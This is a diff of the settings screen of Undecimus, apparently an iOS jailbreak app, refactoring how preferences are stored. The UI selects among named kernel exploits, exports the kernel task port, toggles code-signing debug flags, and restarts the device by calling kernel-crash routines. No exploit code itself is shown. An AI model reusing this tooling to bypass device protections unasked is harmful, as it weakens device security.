 @property (weak, nonatomic) IBOutlet UISwitch *LoadDaemonsSwitch;
@@ -55,8 +36,11 @@
 @property (weak, nonatomic) IBOutlet UIButton *RestartSpringBoardButton;
 @property (weak, nonatomic) IBOutlet UISwitch *HideLogWindowSwitch;
 @property (weak, nonatomic) IBOutlet UISwitch *ResetCydiaCacheSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *SSHOnlySwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *EnableGetTaskAllowSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *SetCSDebuggedSwitch;
 
-+ (NSDictionary *)_provisioningProfileAtPath:(NSString *)path;
++ (NSDictionary *)provisioningProfileAtPath:(NSString *)path;
 
 @end
 

Undecimus/source/SettingsTableViewController.m

@@ -16,6 +16,9 @@
 #include "utils.h"
 #include "voucher_swap-poc.h"
 #include "necp.h"
+#include "kalloc_crash.h"
+#include "prefs.h"
+#include "diagnostics.h"
 
 @interface SettingsTableViewController ()
 
@@ -25,187 +28,28 @@
 
 // https://github.com/Matchstic/ReProvision/blob/7b595c699335940f68702bb204c5aa55b8b1896f/Shared/Application%20Database/RPVApplication.m#L102
 
-+ (NSDictionary *)_provisioningProfileAtPath:(NSString *)path {
-    NSError *err;
-    NSString *stringContent = [NSString stringWithContentsOfFile:path encoding:NSASCIIStringEncoding error:&err];
++ (NSDictionary *)provisioningProfileAtPath:(NSString *)path {
+    auto stringContent = [NSString stringWithContentsOfFile:path encoding:NSASCIIStringEncoding error:nil];
     stringContent = [stringContent componentsSeparatedByString:@"<plist version=\"1.0\">"][1];
     stringContent = [NSString stringWithFormat:@"%@%@", @"<plist version=\"1.0\">", stringContent];
     stringContent = [stringContent componentsSeparatedByString:@"</plist>"][0];
     stringContent = [NSString stringWithFormat:@"%@%@", stringContent, @"</plist>"];
-    
-    NSData *stringData = [stringContent dataUsingEncoding:NSASCIIStringEncoding];
-    
-    NSError *error;
-    NSPropertyListFormat format;
-    
-    id plist = [NSPropertyListSerialization propertyListWithData:stringData options:NSPropertyListImmutable format:&format error:&error];
-    
+    auto const stringData = [stringContent dataUsingEncoding:NSASCIIStringEncoding];
+    id const plist = [NSPropertyListSerialization propertyListWithData:stringData options:NSPropertyListImmutable format:nil error:nil];
     return plist;
 }
 
-#define STATUS_FILE          @"/var/lib/dpkg/status"
-#define CYDIA_LIST @"/etc/apt/sources.list.d/cydia.list"
-
-// https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L1138
-
-+ (NSArray *)dependencyArrayFromString:(NSString *)depends
-{
-    NSMutableArray *cleanArray = [[NSMutableArray alloc] init];
-    NSArray *dependsArray = [depends componentsSeparatedByString:@","];
-    for (id depend in dependsArray)
-    {
-        NSArray *spaceDelimitedArray = [depend componentsSeparatedByString:@" "];
-        NSString *isolatedDependency = [[spaceDelimitedArray objectAtIndex:0] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
-        if ([isolatedDependency length] == 0)
-            isolatedDependency = [[spaceDelimitedArray objectAtIndex:1] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
-        
-        [cleanArray addObject:isolatedDependency];
-    }
-    
-    return cleanArray;
-}
-
-// https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L1163
-
-+ (NSArray *)parsedPackageArray
-{
-    NSString *packageString = [NSString stringWithContentsOfFile:STATUS_FILE encoding:NSUTF8StringEncoding error:nil];
-    NSArray *lineArray = [packageString componentsSeparatedByString:@"\n\n"];
-    //NSLog(@"lineArray: %@", lineArray);
-    NSMutableArray *mutableList = [[NSMutableArray alloc] init];
-    //NSMutableDictionary *mutableDict = [[NSMutableDictionary alloc] init];
-    for (id currentItem in lineArray)
-    {
-        NSArray *packageArray = [currentItem componentsSeparatedByString:@"\n"];
-        //    NSLog(@"packageArray: %@", packageArray);
-        NSMutableDictionary *currentPackage = [[NSMutableDictionary alloc] init];
-        for (id currentLine in packageArray)
-        {
-            NSArray *itemArray = [currentLine componentsSeparatedByString:@": "];
-            if ([itemArray count] >= 2)
-            {
-                NSString *key = [itemArray objectAtIndex:0];
-                NSString *object = [itemArray objectAtIndex:1];
-                
-                if ([key isEqualToString:@"Depends"]) //process the array
-                {
-                    NSArray *dependsObject = [SettingsTableViewController dependencyArrayFromString:object];
-                    
-                    [currentPackage setObject:dependsObject forKey:key];
-                    
-                } else { //every other key, even if it has an array is treated as a string
-                    
-                    [currentPackage setObject:object forKey:key];
-                }
-                
-                
-            }
-        }
-        
-        //NSLog(@"currentPackage: %@\n\n", currentPackage);
-        if ([[currentPackage allKeys] count] > 4)
-        {
-            //[mutableDict setObject:currentPackage forKey:[currentPackage objectForKey:@"Package"]];
-            [mutableList addObject:currentPackage];
-        }
-        
-        currentPackage = nil;
-        
-    }
-    
-    NSSortDescriptor *nameDescriptor = [[NSSortDescriptor alloc] initWithKey:@"Name" ascending:YES
-                                                                    selector:@selector(localizedCaseInsensitiveCompare:)];
-    NSSortDescriptor *packageDescriptor = [[NSSortDescriptor alloc] initWithKey:@"Package" ascending:YES
-                                                                       selector:@selector(localizedCaseInsensitiveCompare:)];
-    NSArray *descriptors = [NSArray arrayWithObjects:nameDescriptor, packageDescriptor, nil];
-    NSArray *sortedArray = [mutableList sortedArrayUsingDescriptors:descriptors];
-    
-    mutableList = nil;
-    
-    return sortedArray;
-}
-
-// https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L854
-
-+ (NSString *)domainFromRepoObject:(NSString *)repoObject
-{
-    //LogSelf;
-    if ([repoObject length] == 0)return nil;
-    NSArray *sourceObjectArray = [repoObject componentsSeparatedByString:@" "];
-    NSString *url = [sourceObjectArray objectAtIndex:1];
-    if ([url length] > 7)
-    {
-        NSString *urlClean = [url substringFromIndex:7];
-        NSArray *secondArray = [urlClean componentsSeparatedByString:@"/"];
-        return [secondArray objectAtIndex:0];
-    }
-    return nil;
-}
-
-// https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L869
-
-+ (NSArray *)sourcesFromFile:(NSString *)theSourceFile
-{
-    NSMutableArray *finalArray = [[NSMutableArray alloc] init];
-    NSString *sourceString = [[NSString stringWithContentsOfFile:theSourceFile encoding:NSASCIIStringEncoding error:nil] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
-    NSArray *sourceFullArray =  [sourceString componentsSeparatedByString:@"\n"];
-    NSEnumerator *sourceEnum = [sourceFullArray objectEnumerator];
-    id currentSource = nil;
-    while (currentSource = [sourceEnum nextObject])
-    {
-        NSString *theObject = [SettingsTableViewController domainFromRepoObject:currentSource];
-        if (theObject != nil)
-        {
-            if (![finalArray containsObject:theObject])
-                [finalArray addObject:theObject];
-        }
-    }
-    
-    return finalArray;
-}
-
-+ (NSDictionary *)getDiagnostics {
-    struct utsname u = { 0 };
-    uname(&u);
-    NSDictionary *systemVersion = [NSDictionary dictionaryWithContentsOfFile:@"/System/Library/CoreServices/SystemVersion.plist"];
-    NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults];
-    return @{
-        @"Sysname": @(u.sysname),
-        @"Nodename": @(u.nodename),
-        @"Release": @(u.release),
-        @"Version": @(u.version),
-        @"Machine": @(u.machine),
-        @"ProductVersion": systemVersion[@"ProductVersion"],
-        @"ProductBuildVersion": systemVersion[@"ProductBuildVersion"],
-        @"Sources": [SettingsTableViewController sourcesFromFile:CYDIA_LIST],
-        @"Packages": [SettingsTableViewController parsedPackageArray],
-        @"Preferences": @{
-            @"TweakInjection": [defaults objectForKey:K_TWEAK_INJECTION],
-            @"LoadDaemons": [defaults objectForKey:K_LOAD_DAEMONS],
-            @"DumpAPTicket": [defaults objectForKey:K_DUMP_APTICKET],
-            @"RefreshIconCache": [defaults objectForKey:K_REFRESH_ICON_CACHE],
-            @"BootNonce": [defaults objectForKey:K_BOOT_NONCE],
-            @"Exploit": [defaults objectForKey:K_EXPLOIT],
-            @"DisableAutoUpdates": [defaults objectForKey:K_DISABLE_AUTO_UPDATES],
-            @"DisableAppRevokes": [defaults objectForKey:K_DISABLE_APP_REVOKES],
-            @"OverwriteBootNonce": [defaults objectForKey:K_OVERWRITE_BOOT_NONCE],
-            @"ExportKernelTaskPort": [defaults objectForKey:K_EXPORT_KERNEL_TASK_PORT],
-            @"RestoreRootFS": [defaults objectForKey:K_RESTORE_ROOTFS],
-            @"IncreaseMemoryLimit": [defaults objectForKey:K_INCREASE_MEMORY_LIMIT],
-            @"InstallCydia": [defaults objectForKey:K_INSTALL_CYDIA],
-            @"InstallOpenSSH": [defaults objectForKey:K_INSTALL_OPENSSH]
-        },
-        @"AppVersion": appVersion(),
-        @"LogFile": [NSString stringWithContentsOfFile:getLogFile() encoding:NSUTF8StringEncoding error:nil]
-    };
+- (void)viewWillAppear:(BOOL)animated {
+    [super viewWillAppear:animated];
+    [self reloadData];
 }
 
 - (void)viewDidLoad {
     [super viewDidLoad];
-    UIImageView *myImageView = [[UIImageView alloc] initWithImage:[UIImage imageNamed:@"Clouds"]];
+    auto const myImageView = [[UIImageView alloc] initWithImage:[UIImage imageNamed:@"Clouds"]];
     [myImageView setContentMode:UIViewContentModeScaleAspectFill];
     [myImageView setFrame:self.tableView.frame];
-    UIView *myView = [[UIView alloc] initWithFrame:myImageView.frame];
+    auto const myView = [[UIView alloc] initWithFrame:myImageView.frame];
     [myView setBackgroundColor:[UIColor whiteColor]];
     [myView setAlpha:0.84];
     [myView setAutoresizingMask:UIViewAutoresizingFlexibleWidth | UIViewAutoresizingFlexibleHeight];
@@ -215,7 +59,6 @@
     self.tap = [[UITapGestureRecognizer alloc] initWithTarget:self action:@selector(userTappedAnyware:)];
     self.tap.cancelsTouchesInView = NO;
     [self.view addGestureRecognizer:self.tap];
-    [self reloadData];
 }
 
 - (void)userTappedAnyware:(UITapGestureRecognizer *) sender
@@ -229,63 +72,78 @@
 }
 
 - (void)reloadData {
-    [self.TweakInjectionSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_TWEAK_INJECTION]];
-    [self.LoadDaemonsSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_LOAD_DAEMONS]];
-    [self.DumpAPTicketSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_DUMP_APTICKET]];
-    [self.BootNonceTextField setPlaceholder:[[NSUserDefaults standardUserDefaults] objectForKey:K_BOOT_NONCE]];
+    auto prefs = copy_prefs();
+    [self.TweakInjectionSwitch setOn:(BOOL)prefs->load_tweaks];
+    [self.LoadDaemonsSwitch setOn:(BOOL)prefs->load_daemons];
+    [self.DumpAPTicketSwitch setOn:(BOOL)prefs->dump_apticket];
+    [self.BootNonceTextField setPlaceholder:@(prefs->boot_nonce)];
     [self.BootNonceTextField setText:nil];
-    [self.RefreshIconCacheSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_REFRESH_ICON_CACHE]];
-    [self.KernelExploitSegmentedControl setSelectedSegmentIndex:[[NSUserDefaults standardUserDefaults] integerForKey:K_EXPLOIT]];
-    [self.DisableAutoUpdatesSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_DISABLE_AUTO_UPDATES]];
-    [self.DisableAppRevokesSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_DISABLE_APP_REVOKES]];
+    [self.RefreshIconCacheSwitch setOn:(BOOL)prefs->run_uicache];
+    [self.KernelExploitSegmentedControl setSelectedSegmentIndex:(int)prefs->exploit];
+    [self.DisableAutoUpdatesSwitch setOn:(BOOL)prefs->disable_auto_updates];
+    [self.DisableAppRevokesSwitch setOn:(BOOL)prefs->disable_app_revokes];
     [self.KernelExploitSegmentedControl setEnabled:supportsExploit(empty_list_exploit) forSegmentAtIndex:empty_list_exploit];
     [self.KernelExploitSegmentedControl setEnabled:supportsExploit(multi_path_exploit) forSegmentAtIndex:multi_path_exploit];
     [self.KernelExploitSegmentedControl setEnabled:supportsExploit(async_wake_exploit) forSegmentAtIndex:async_wake_exploit];
     [self.KernelExploitSegmentedControl setEnabled:supportsExploit(voucher_swap_exploit) forSegmentAtIndex:voucher_swap_exploit];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(v1ntex_exploit) forSegmentAtIndex:v1ntex_exploit];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(v3ntex_exploit) forSegmentAtIndex:v3ntex_exploit];
+    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(mach_swap_exploit) forSegmentAtIndex:mach_swap_exploit];
+    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(mach_swap_2_exploit) forSegmentAtIndex:mach_swap_2_exploit];
     [self.OpenCydiaButton setEnabled:[[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"cydia://"]]];
-    [self.ExpiryLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)[[SettingsTableViewController _provisioningProfileAtPath:[[NSBundle mainBundle] pathForResource:@"embedded" ofType:@"mobileprovision"]][@"ExpirationDate"] timeIntervalSinceDate:[NSDate date]] / 86400, NSLocalizedString(@"Days", nil)]];
-    [self.OverwriteBootNonceSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_OVERWRITE_BOOT_NONCE]];
-    [self.ExportKernelTaskPortSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_EXPORT_KERNEL_TASK_PORT]];
-    [self.RestoreRootFSSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_RESTORE_ROOTFS]];
-    [self.UptimeLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)uptime() / 86400, NSLocalizedString(@"Days", nil)]];
-    [self.IncreaseMemoryLimitSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_INCREASE_MEMORY_LIMIT]];
-    [self.installSSHSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_INSTALL_OPENSSH]];
-    [self.installCydiaSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_INSTALL_CYDIA]];
-    [self.ECIDLabel setPlaceholder:hexFromInt([[[NSUserDefaults standardUserDefaults] objectForKey:K_ECID] integerValue])];
-    [self.ReloadSystemDaemonsSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_RELOAD_SYSTEM_DAEMONS]];
-    [self.HideLogWindowSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_HIDE_LOG_WINDOW]];
-    [self.ResetCydiaCacheSwitch setOn:[[NSUserDefaults standardUserDefaults] boolForKey:K_RESET_CYDIA_CACHE]];
+    [self.ExpiryLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)[[SettingsTableViewController provisioningProfileAtPath:[[NSBundle mainBundle] pathForResource:@"embedded" ofType:@"mobileprovision"]][@"ExpirationDate"] timeIntervalSinceDate:[NSDate date]] / 86400, localize(@"Days")]];
+    [self.OverwriteBootNonceSwitch setOn:(BOOL)prefs->overwrite_boot_nonce];
+    [self.ExportKernelTaskPortSwitch setOn:(BOOL)prefs->export_kernel_task_port];
+    [self.RestoreRootFSSwitch setOn:(BOOL)prefs->restore_rootfs];
+    [self.UptimeLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)getUptime() / 86400, localize(@"Days")]];
+    [self.IncreaseMemoryLimitSwitch setOn:(BOOL)prefs->increase_memory_limit];
+    [self.installSSHSwitch setOn:(BOOL)prefs->install_openssh];
+    [self.installCydiaSwitch setOn:(BOOL)prefs->install_cydia];
+    [self.ECIDLabel setPlaceholder:hexFromInt([@(prefs->ecid) integerValue])];
+    [self.ReloadSystemDaemonsSwitch setOn:(BOOL)prefs->reload_system_daemons];
+    [self.HideLogWindowSwitch setOn:(BOOL)prefs->hide_log_window];
+    [self.ResetCydiaCacheSwitch setOn:(BOOL)prefs->reset_cydia_cache];
+    [self.SSHOnlySwitch setOn:(BOOL)prefs->ssh_only];
+    [self.EnableGetTaskAllowSwitch setOn:(BOOL)prefs->enable_get_task_allow];
+    [self.SetCSDebuggedSwitch setOn:(BOOL)prefs->set_cs_debugged];
     [self.RestartSpringBoardButton setEnabled:respringSupported()];
     [self.restartButton setEnabled:restartSupported()];
+    release_prefs(&prefs);
     [self.tableView reloadData];
 }
 
 - (IBAction)TweakInjectionSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.TweakInjectionSwitch isOn] forKey:K_TWEAK_INJECTION];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->load_tweaks = (bool)self.TweakInjectionSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
+
 - (IBAction)LoadDaemonsSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.LoadDaemonsSwitch isOn] forKey:K_LOAD_DAEMONS];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->load_daemons = (bool)self.LoadDaemonsSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
+
 - (IBAction)DumpAPTicketSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.DumpAPTicketSwitch isOn] forKey:K_DUMP_APTICKET];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->dump_apticket = (bool)self.DumpAPTicketSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)BootNonceTextFieldTriggered:(id)sender {
-    uint64_t val = 0;
+    auto val = (uint64_t)0;
     if ([[NSScanner scannerWithString:[self.BootNonceTextField text]] scanHexLongLong:&val] && val != HUGE_VAL && val != -HUGE_VAL) {
-        [[NSUserDefaults standardUserDefaults] setObject:[NSString stringWithFormat:@ADDR, val] forKey:K_BOOT_NONCE];
-        [[NSUserDefaults standardUserDefaults] synchronize];
+        auto prefs = copy_prefs();
+        prefs->boot_nonce = [NSString stringWithFormat:@ADDR, val].UTF8String;
+        set_prefs(prefs);
+        release_prefs(&prefs);
     } else {
-        UIAlertController *alertController = [UIAlertController alertControllerWithTitle:NSLocalizedString(@"Invalid Entry", nil) message:NSLocalizedString(@"The boot nonce entered could not be parsed", nil) preferredStyle:UIAlertControllerStyleAlert];
-        UIAlertAction *OK = [UIAlertAction actionWithTitle:NSLocalizedString(@"OK", nil) style:UIAlertActionStyleDefault handler:nil];
+        auto const alertController = [UIAlertController alertControllerWithTitle:localize(@"Invalid Entry") message:localize(@"The boot nonce entered could not be parsed") preferredStyle:UIAlertControllerStyleAlert];
+        auto const OK = [UIAlertAction actionWithTitle:localize(@"OK") style:UIAlertActionStyleDefault handler:nil];
         [alertController addAction:OK];
         [self presentViewController:alertController animated:YES completion:nil];
     }
@@ -293,27 +151,33 @@
 }
 
 - (IBAction)RefreshIconCacheSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.RefreshIconCacheSwitch isOn] forKey:K_REFRESH_ICON_CACHE];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->run_uicache = (bool)self.RefreshIconCacheSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
+
 - (IBAction)KernelExploitSegmentedControl:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setInteger:self.KernelExploitSegmentedControl.selectedSegmentIndex forKey:K_EXPLOIT];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->exploit = (int)self.KernelExploitSegmentedControl.selectedSegmentIndex;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)DisableAppRevokesSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.DisableAppRevokesSwitch isOn] forKey:K_DISABLE_APP_REVOKES];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->disable_app_revokes = (bool)self.DisableAppRevokesSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)tappedOnRestart:(id)sender {
-    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), ^{
-        NOTICE(NSLocalizedString(@"The device will be restarted.", nil), true, false);
-        NSInteger support = recommendedRestartSupport();
-        _assert(support != -1, message, true);
+    auto const block = ^(void) {
+        notice(localize(@"The device will be restarted."), true, false);
+        auto const support = recommendedRestartSupport();
         switch (support) {
             case necp_exploit: {
                 necp_die();
@@ -323,23 +187,30 @@
                 voucher_swap_poc();
                 break;
             }
+            case kalloc_crash: {
+                do_kalloc_crash();
+                break;
+            }
             default:
                 break;
         }
         exit(EXIT_FAILURE);
-    });
+    };
+    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
 - (IBAction)DisableAutoUpdatesSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.DisableAutoUpdatesSwitch isOn] forKey:K_DISABLE_AUTO_UPDATES];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->disable_auto_updates = (bool)self.DisableAutoUpdatesSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)tappedOnShareDiagnosticsData:(id)sender {
-    NSURL *URL = [NSURL fileURLWithPath:[NSString stringWithFormat:@"%@/Documents/diagnostics.plist", NSHomeDirectory()]];
-    [[SettingsTableViewController getDiagnostics] writeToURL:URL error:nil];
-    UIActivityViewController *activityViewController = [[UIActivityViewController alloc] initWithActivityItems:@[URL] applicationActivities:nil];
+    auto const URL = [NSURL fileURLWithPath:[NSString stringWithFormat:@"%@/Documents/diagnostics.plist", NSHomeDirectory()]];
+    [getDiagnostics() writeToURL:URL error:nil];
+    auto const activityViewController = [[UIActivityViewController alloc] initWithActivityItems:@[URL] applicationActivities:nil];
     if ([activityViewController respondsToSelector:@selector(popoverPresentationController)]) {
         [[activityViewController popoverPresentationController] setSourceView:self.ShareDiagnosticsDataButton];
     }
@@ -355,66 +226,82 @@
 }
 
 - (IBAction)OverwriteBootNonceSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.OverwriteBootNonceSwitch isOn] forKey:K_OVERWRITE_BOOT_NONCE];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->overwrite_boot_nonce = (bool)self.OverwriteBootNonceSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)tappedOnCopyNonce:(id)sender{
-    UIAlertController *copyBootNonceAlert = [UIAlertController alertControllerWithTitle:NSLocalizedString(@"Copy boot nonce?", nil) message:NSLocalizedString(@"Would you like to copy nonce generator to clipboard?", nil) preferredStyle:UIAlertControllerStyleAlert];
-    UIAlertAction *copyAction = [UIAlertAction actionWithTitle:NSLocalizedString(@"Yes", nil) style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
-        [[UIPasteboard generalPasteboard] setString:[[NSUserDefaults standardUserDefaults] objectForKey:K_BOOT_NONCE]];
+    auto const copyBootNonceAlert = [UIAlertController alertControllerWithTitle:localize(@"Copy boot nonce?") message:localize(@"Would you like to copy nonce generator to clipboard?") preferredStyle:UIAlertControllerStyleAlert];
+    auto const copyAction = [UIAlertAction actionWithTitle:localize(@"Yes") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
+        auto prefs = copy_prefs();
+        [[UIPasteboard generalPasteboard] setString:@(prefs->boot_nonce)];
+        release_prefs(&prefs);
     }];
-    UIAlertAction *noAction = [UIAlertAction actionWithTitle:NSLocalizedString(@"No", nil) style:UIAlertActionStyleCancel handler:nil];
+    auto const noAction = [UIAlertAction actionWithTitle:localize(@"No") style:UIAlertActionStyleCancel handler:nil];
     [copyBootNonceAlert addAction:copyAction];
     [copyBootNonceAlert addAction:noAction];
     [self presentViewController:copyBootNonceAlert animated:TRUE completion:nil];
 }
 
 - (IBAction)tappedOnCopyECID:(id)sender {
-    UIAlertController *copyBootNonceAlert = [UIAlertController alertControllerWithTitle:NSLocalizedString(@"Copy ECID?", nil) message:NSLocalizedString(@"Would you like to ECID to clipboard?", nil) preferredStyle:UIAlertControllerStyleAlert];
-    UIAlertAction *copyAction = [UIAlertAction actionWithTitle:NSLocalizedString(@"Yes", nil) style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
-        [[UIPasteboard generalPasteboard] setString:hexFromInt([[[NSUserDefaults standardUserDefaults] objectForKey:K_ECID] integerValue])];
+    auto const copyBootNonceAlert = [UIAlertController alertControllerWithTitle:localize(@"Copy ECID?") message:localize(@"Would you like to ECID to clipboard?") preferredStyle:UIAlertControllerStyleAlert];
+    auto const copyAction = [UIAlertAction actionWithTitle:localize(@"Yes") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
+        auto prefs = copy_prefs();
+        [[UIPasteboard generalPasteboard] setString:hexFromInt(@(prefs->ecid).integerValue)];
+        release_prefs(&prefs);
     }];
-    UIAlertAction *noAction = [UIAlertAction actionWithTitle:NSLocalizedString(@"No", nil) style:UIAlertActionStyleCancel handler:nil];
+    auto const noAction = [UIAlertAction actionWithTitle:localize(@"No") style:UIAlertActionStyleCancel handler:nil];
     [copyBootNonceAlert addAction:copyAction];
     [copyBootNonceAlert addAction:noAction];
     [self presentViewController:copyBootNonceAlert animated:TRUE completion:nil];
 }
 
 - (IBAction)tappedOnCheckForUpdate:(id)sender {
-    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), ^{
-        NSString *Update = [NSString stringWithContentsOfURL:[NSURL URLWithString:@"https://github.com/pwn20wndstuff/Undecimus/raw/master/Update.txt"] encoding:NSUTF8StringEncoding error:nil];
-        if (Update == nil) {
-            NOTICE(NSLocalizedString(@"Failed to check for update.", nil), true, false);
-        } else if ([Update compare:appVersion() options:NSNumericSearch] == NSOrderedDescending) {
-            NOTICE(NSLocalizedString(@"An update is available.", nil), true, false);
+    auto const block = ^(void) {
+        auto const update = [NSString stringWithContentsOfURL:[NSURL URLWithString:@"https://github.com/pwn20wndstuff/Undecimus/raw/master/Update.txt"] encoding:NSUTF8StringEncoding error:nil];
+        if (update == nil) {
+            notice(localize(@"Failed to check for update."), true, false);
+        } else if ([update compare:appVersion() options:NSNumericSearch] == NSOrderedDescending) {
+            notice(localize(@"An update is available."), true, false);
         } else {
-            NOTICE(NSLocalizedString(@"Already up to date.", nil), true, false);
+            notice(localize(@"Already up to date."), true, false);
         }
-    });
+    };
+    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
 - (IBAction)exportKernelTaskPortSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.ExportKernelTaskPortSwitch isOn] forKey:K_EXPORT_KERNEL_TASK_PORT];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->export_kernel_task_port = (bool)self.ExportKernelTaskPortSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
+
 - (IBAction)RestoreRootFSSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.RestoreRootFSSwitch isOn] forKey:K_RESTORE_ROOTFS];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->restore_rootfs = (bool)self.RestoreRootFSSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)installCydiaSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.installCydiaSwitch isOn] forKey:K_INSTALL_CYDIA];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->install_cydia = (bool)self.installCydiaSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)installSSHSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.installSSHSwitch isOn] forKey:K_INSTALL_OPENSSH];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->install_openssh = (bool)self.installSSHSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
@@ -424,64 +311,107 @@
 }
 
 - (IBAction)IncreaseMemoryLimitSwitch:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.IncreaseMemoryLimitSwitch isOn] forKey:K_INCREASE_MEMORY_LIMIT];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->increase_memory_limit = (bool)self.IncreaseMemoryLimitSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)tappedOnAutomaticallySelectExploit:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setInteger:recommendedJailbreakSupport() forKey:K_EXPLOIT];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->exploit = (int)recommendedJailbreakSupport();
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
